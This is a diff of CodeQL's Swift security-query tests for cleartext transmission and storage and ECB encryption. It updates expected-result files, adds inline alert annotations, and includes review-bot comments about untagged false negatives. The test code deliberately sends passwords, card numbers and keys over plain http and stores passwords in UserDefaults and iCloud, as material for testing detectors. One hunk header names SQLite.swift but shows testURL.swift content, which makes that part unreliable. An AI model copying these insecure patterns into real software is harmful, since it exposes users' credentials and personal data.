-| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. 
| testSend.swift:77:27:77:30 | .birth_day | .birth_day | -| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | -| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | -| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | -| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | -| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | -| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | -| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... 
.+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | -| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | -| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | -| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | -| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | -| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | -| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | -| testURL.swift:75:18:75:69 | ... .+(_:_:) ... 
| testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | -| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | -| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | -| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | -| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | -| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref index f4c5a561e617..3b301c53e7fd 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref 
+++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-311/CleartextTransmission.ql
\ No newline at end of file
+query: queries/Security/CWE-311/CleartextTransmission.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift b/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift
index 6874683d8730..6c7d57f271c6 100644
--- a/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift
+++ b/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift
@@ -116,64 +116,64 @@ func ==(lhs: Expression, rhs: V) -> Expression { return Expression String { return myString } func test1(passwd : String, encrypted_passwd : String, account_no : String, credit_card_no : String) { - _ = URL(string: "http://example.com/login?p=" + passwd); // BAD + _ = URL(string: "http://example.com/login?p=" + passwd); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?p=" + encrypted_passwd); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?ac=" + account_no); // BAD - _ = URL(string: "http://example.com/login?cc=" + credit_card_no); // BAD + _ = URL(string: "http://example.com/login?ac=" + account_no); // BAD // $ Alert[swift/cleartext-transmission] + _ = URL(string: "http://example.com/login?cc=" + credit_card_no); // BAD // $ Alert[swift/cleartext-transmission] let base = URL(string: "http://example.com/"); // GOOD (not sensitive) _ = URL(string: "abc", relativeTo: base); // GOOD (not sensitive) - let f = URL(string: passwd, relativeTo: base); // BAD + let f = URL(string: passwd, relativeTo: base); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "abc", relativeTo: f); // BAD (reported on line above) let e_mail = myString - _ = URL(string: "http://example.com/login?em=" + e_mail); // BAD + _ = URL(string: "http://example.com/login?em=" + e_mail); // BAD // $ Alert[swift/cleartext-transmission] let a_homeaddr_z = getMyString() - _ = URL(string: "http://example.com/login?home=" + a_homeaddr_z); // BAD + _ = URL(string: "http://example.com/login?home=" + a_homeaddr_z); // BAD // $ Alert[swift/cleartext-transmission] let resident_ID = getMyString() - _ = URL(string: "http://example.com/login?id=" + resident_ID); // BAD + _ = URL(string: "http://example.com/login?id=" + resident_ID); // BAD // $ Alert[swift/cleartext-transmission] } func get_private_key() -> String { return "" } 
@@ -70,9 +70,9 @@ func test2() { _ = URL(string: "http://example.com/login?key=" + get_aes_key()); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=" + get_aws_key()); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=" + get_access_key()); // BAD [NOT DETECTED] - _ = URL(string: "http://example.com/login?key=" + get_secret_key()); // BAD + _ = URL(string: "http://example.com/login?key=" + get_secret_key()); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?key=" + get_key_press()); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?cert=" + get_cert_string()); // BAD + _ = URL(string: "http://example.com/login?cert=" + get_cert_string()); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?certain=" + get_certain()); // GOOD (not sensitive) } @@ -93,7 +93,7 @@ func test3() { _ = URL(string: "http://example.com/login?key=\(priv_key)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=\(private_key)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=\(pub_key)"); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?cert=\(certificate)"); // BAD + _ = URL(string: "http://example.com/login?cert=\(certificate)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?tok=\(secure_token)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?tok=\(access_token)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?tok=\(auth_token)"); // BAD [NOT DETECTED] 
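Review bot: The `BAD [NOT DETECTED]` context lines in this hunk (`get_aes_key()`, `get_aws_key()`, `get_access_key()`) still carry no inline expectation, so the known false negatives for key material sent over plain HTTP stay recorded only as free-text comments while the detected cases are now machine-checked. Assuming the inline-expectations postprocess added in the `.qlref` accepts it, consider tagging them, e.g. `// BAD [NOT DETECTED] // $ MISSING: Alert[swift/cleartext-transmission]`, so that a later change to the sensitive-data heuristics shows up as an explicit test update. The same applies to the `priv_key`, `private_key`, `secure_token`, `access_token` and `auth_token` lines in the `test3` hunk (`@@ -93,7`) and to the `mailto:info@example.com?subject=\(secret_key)` line in the `test5` hunk (`@@ -113,14`). The body of `test2` starts outside the hunk, so other untagged lines may exist above it.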
@@ -101,9 +101,9 @@ func test3() { } func test4(key: SecKey) { - if let data = SecKeyCopyExternalRepresentation(key, nil) as? Data { + if let data = SecKeyCopyExternalRepresentation(key, nil) as? Data { // $ Source[swift/cleartext-transmission] if let string = String(data: data, encoding: .utf8) { - _ = URL(string: "http://example.com/login?tok=\(string)"); // BAD + _ = URL(string: "http://example.com/login?tok=\(string)"); // BAD // $ Alert[swift/cleartext-transmission] } } } @@ -113,14 +113,14 @@ func test5() { let email = get_string() let secret_key = get_string() - _ = URL(string: "http://example.com/login?email=\(email)"); // BAD + _ = URL(string: "http://example.com/login?email=\(email)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "mailto:\(email)"); // GOOD (revealing your e-amil address in an e-mail is expected) _ = URL(string: "mailto:info@example.com?subject=\(secret_key)"); // BAD [NOT DETECTED] _ = URL(string: "mailto:info@example.com?subject=foo&cc=\(email)"); // GOOD let phone_number = get_string() - _ = URL(string: "http://example.com/profile?tel=\(phone_number)"); // BAD + _ = URL(string: "http://example.com/profile?tel=\(phone_number)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "tel:\(phone_number)") // GOOD _ = URL(string: "telprompt:\(phone_number)") // GOOD _ = URL(string: "callto:\(phone_number)") // GOOD @@ -129,5 +129,5 @@ func test5() { let account_no = get_string() _ = URL(string: "file:///foo/bar/\(account_no).csv") // GOOD (local, so not transmitted) - _ = URL(string: "ftp://example.com/\(account_no).csv") // BAD + _ = URL(string: "ftp://example.com/\(account_no).csv") // BAD // $ Alert[swift/cleartext-transmission] } diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected index c3ed50e498cb..9c412f25ceeb 100644 
--- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected
+++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected
@@ -1,3 +1,19 @@ +#select +| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | +| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | +| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | +| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. 
It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | +| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | +| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | +| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. 
| testUserDefaults.swift:55:10:55:10 | passwd | passwd | +| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | +| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | provenance | | 
@@ -45,19 +61,3 @@ nodes | testUserDefaults.swift:82:28:82:40 | .value | semmle.label | .value | subpaths | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:74:7:74:7 | self | file://:0:0:0:0 | .value | testUserDefaults.swift:82:28:82:40 | .value | -#select -| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | -| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | -| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | -| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. 
| testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | -| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | -| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. 
| testUserDefaults.swift:49:28:49:30 | .password | .password | -| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | -| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | -| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref index 574e0e172326..dfb639f1beab 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref +++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref @@ -1 +1,2 @@ -queries/Security/CWE-312/CleartextStoragePreferences.ql +query: queries/Security/CWE-312/CleartextStoragePreferences.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift b/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift index 20627a6483be..458ccbe00da3 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift @@ -25,7 +25,7 @@ func doSomething(password: String) { } func test1(password: String, passwordHash : String) { let store = NSUbiquitousKeyValueStore.default - store.set(password, forKey: "myKey") // BAD + store.set(password, forKey: "myKey") // BAD // $ Alert store.set(passwordHash, forKey: "myKey") // GOOD (not sensitive) } 
@@ -38,27 +38,27 @@ func test3(x: String) { // alternative evidence of sensitivity... NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD [NOT REPORTED] - doSomething(password: x); - NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD + doSomething(password: x); // $ Source + NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD // $ Alert - let y = getPassword(); - NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD + let y = getPassword(); // $ Source + NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD // $ Alert let z = MyClass() NSUbiquitousKeyValueStore.default.set(z.harmless, forKey: "myKey") // GOOD (not sensitive) - NSUbiquitousKeyValueStore.default.set(z.password, forKey: "myKey") // BAD + NSUbiquitousKeyValueStore.default.set(z.password, forKey: "myKey") // BAD // $ Alert } func test4(passwd: String) { // sanitizers... - var x = passwd; - var y = passwd; - var z = passwd; + var x = passwd; // $ Source + var y = passwd; // $ Source + var z = passwd; // $ Source - NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD - NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD - NSUbiquitousKeyValueStore.default.set(z, forKey: "myKey") // BAD + NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD // $ Alert + NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD // $ Alert + NSUbiquitousKeyValueStore.default.set(z, forKey: "myKey") // BAD // $ Alert x = encrypt(x); hash(data: &y); diff --git a/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift b/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift index 10a1a04eedf4..dab0cc4504c1 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift 
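Review bot: The known false negative in `test3` is still recorded only as free text: the first `NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD [NOT REPORTED]` line stays an unannotated context line while every reported sink around it gains `// $ Alert`. With the inline-expectations postprocess now enabled for this test, writing it as `// BAD [NOT REPORTED] // $ MISSING: Alert` would make the detection gap machine-checked, so the test reports the annotation as fixed once the query starts flagging cleartext storage at that call. The `test3` hunk of testUserDefaults.swift carries the same unannotated line (`UserDefaults.standard.set(x, forKey: "myKey") // BAD [NOT REPORTED]`) and needs the same change. Both `test3` and `test4` extend beyond this hunk, so any further unreported cases outside it are not visible here.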
@@ -25,7 +25,7 @@ func doSomething(password: String) { } func test1(password: String, passwordHash : String) { let defaults = UserDefaults.standard - defaults.set(password, forKey: "myKey") // BAD + defaults.set(password, forKey: "myKey") // BAD // $ Alert defaults.set(passwordHash, forKey: "myKey") // GOOD (not sensitive) } @@ -38,27 +38,27 @@ func test3(x: String) { // alternative evidence of sensitivity... UserDefaults.standard.set(x, forKey: "myKey") // BAD [NOT REPORTED] - doSomething(password: x); - UserDefaults.standard.set(x, forKey: "myKey") // BAD + doSomething(password: x); // $ Source + UserDefaults.standard.set(x, forKey: "myKey") // BAD // $ Alert - let y = getPassword(); - UserDefaults.standard.set(y, forKey: "myKey") // BAD + let y = getPassword(); // $ Source + UserDefaults.standard.set(y, forKey: "myKey") // BAD // $ Alert let z = MyClass() UserDefaults.standard.set(z.harmless, forKey: "myKey") // GOOD (not sensitive) - UserDefaults.standard.set(z.password, forKey: "myKey") // BAD + UserDefaults.standard.set(z.password, forKey: "myKey") // BAD // $ Alert } func test4(passwd: String) { // sanitizers... - var x = passwd; - var y = passwd; - var z = passwd; + var x = passwd; // $ Source + var y = passwd; // $ Source + var z = passwd; // $ Source - UserDefaults.standard.set(x, forKey: "myKey") // BAD - UserDefaults.standard.set(y, forKey: "myKey") // BAD - UserDefaults.standard.set(z, forKey: "myKey") // BAD + UserDefaults.standard.set(x, forKey: "myKey") // BAD // $ Alert + UserDefaults.standard.set(y, forKey: "myKey") // BAD // $ Alert + UserDefaults.standard.set(z, forKey: "myKey") // BAD // $ Alert x = encrypt(x); hash(data: &y); @@ -79,6 +79,6 @@ struct MyOuter { } func test5(mo : MyOuter) { - UserDefaults.standard.set(mo.password.value, forKey: "myKey") // BAD + UserDefaults.standard.set(mo.password.value, forKey: "myKey") // BAD // $ Alert UserDefaults.standard.set(mo.harmless.value, forKey: "myKey") // GOOD } 
diff --git a/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref b/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref
index 92bca37534a5..c2fdce8b0e02 100644
--- a/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref
@@ -1 +1 @@
-queries/Security/CWE-321/HardcodedEncryptionKey.ql
+query: queries/Security/CWE-321/HardcodedEncryptionKey.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected
index 32c4082abb92..e1dcb0bbd955 100644
--- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected
+++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected
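Review bot: HardcodedEncryptionKey.qlref gains only the `query:` key, while the CWE-312 and CWE-327 qlrefs in the same patch also add `postprocess: utils/test/InlineExpectationsTestQuery.ql`. If the omission is deliberate, for instance because the CWE-321 test sources carry no `// $ Alert` annotations yet, the commit description should say so. Otherwise the hard-coded key test keeps relying on its `.expected` file alone and should get the same `postprocess:` line together with annotated sources. The CWE-321 test sources are not part of this hunk, so this is inferred from the qlref alone.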
@@ -1,3 +1,13 @@ +#select +| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | +| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | +| test.swift:60:37:60:53 | call to getECBBlockMode() | 